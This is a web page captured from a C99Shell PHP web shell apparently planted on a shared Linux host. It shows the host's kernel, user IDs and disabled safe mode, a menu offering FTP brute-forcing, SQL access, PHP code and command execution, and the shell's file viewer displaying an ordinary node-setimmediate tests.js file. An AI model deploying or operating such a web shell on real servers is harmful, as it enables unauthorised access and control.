!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.3.27 

uname -a: Linux pdx1-shared-a4-04 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64 

uid=6659440(dh_z2jmpm) gid=2086089(pg10499364) groups=2086089(pg10499364)  

Safe-mode: OFF (not secure)

/usr/share/doc/node-setimmediate/examples/   drwxr-xr-x
Free 661.83 GB of 879.6 GB (75.24%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     tests.js (1.27 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/*"use strict";*/
/*global setImmediate: false, specify: false, window: false */

function assert(condition) {
    if (!condition) {
        throw new Error("Assertion failed");
    }
}
assert.strictEqual = function (x, y) {
    if (x !== y) {
        throw new Error(x + " !== " + y);
    }
};

it("Modal dialogs block handlers", function (done) {
    // Try to launch the less-annoying self-closing-window modal dialog; if that's not an option, fall back to alert.
    var showTheDialog = window.showModalDialog ?
        function () {
            window.showModalDialog("selfClose.htm");
        }
        : function () {
            window.alert("Please press OK to continue the test; we needed a modal dialog.");
        };

    var dialogClosed = false;
    setImmediate(function () {
        showTheDialog();
        dialogClosed = true;
    });

    setImmediate(function () {
        assert(dialogClosed);
        done();
    });
});

if (typeof window.Worker === "function") {
    it("When inside a web worker context, setImmediate calls the passed handler", function (done) {
        var worker = new window.Worker("worker.js");
        worker.addEventListener("message", function (event) {
            assert.strictEqual(event.data, "TEST");
            done();
        }, false);
    });
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0107 ]--